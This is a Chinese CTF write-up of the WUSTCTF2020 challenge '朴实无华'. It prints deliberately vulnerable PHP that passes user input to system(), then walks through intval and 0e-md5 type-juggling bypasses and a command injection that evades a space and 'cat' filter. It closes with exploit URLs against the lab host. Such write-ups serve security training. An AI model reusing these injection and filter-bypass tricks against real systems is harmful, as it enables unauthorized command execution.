[WUSTCTF2020]朴实无华
robots.txt
首先拿御剑扫一下(因为buu上的docker性能不太行,扫多了就崩,所以建议用dirsearch并带上延时)。
扫出了个robots.txt
mdzz假flag,傻逼玩意。
在响应头里面有fl4g.php.
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
?>
level1
intval($num) < 2020 && intval($num + 1) > 2021
这里传入num=1e7即可。
在进行intval($num)时被截断成为1,1<2020 => True;
而$num+1时就解析为科学技术法,结果是10000001(也不知道位数对不对,随意啦)。
绕过了。
level2
$md5=$_GET['md5'];
一般绕过md5的方法有两种,一个是以0e开头,后面全是数字的结果,这个会被解析为科学计数法为0;另一个是利用数组绕过。
这里利用0e绕过:
md5('0e215962017') ==> “0e291242476940776845150308577824”
get flag
这里是个RCE,过滤了空格和cat。
空格用%09(tab)绕过,cat用反斜杠绕过,构造成ca :
先ls:
http://3ec17ead-aa65-40ca-8eea-97b0ad359286.node3.buuoj.cn/fl4g.php?num=1e7&md5=0e215962017&get_flag=ls
cat flag
http://3ec17ead-aa65-40ca-8eea-97b0ad359286.node3.buuoj.cn/fl4g.php?num=1e7&md5=0e215962017&get_flag=ca %09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
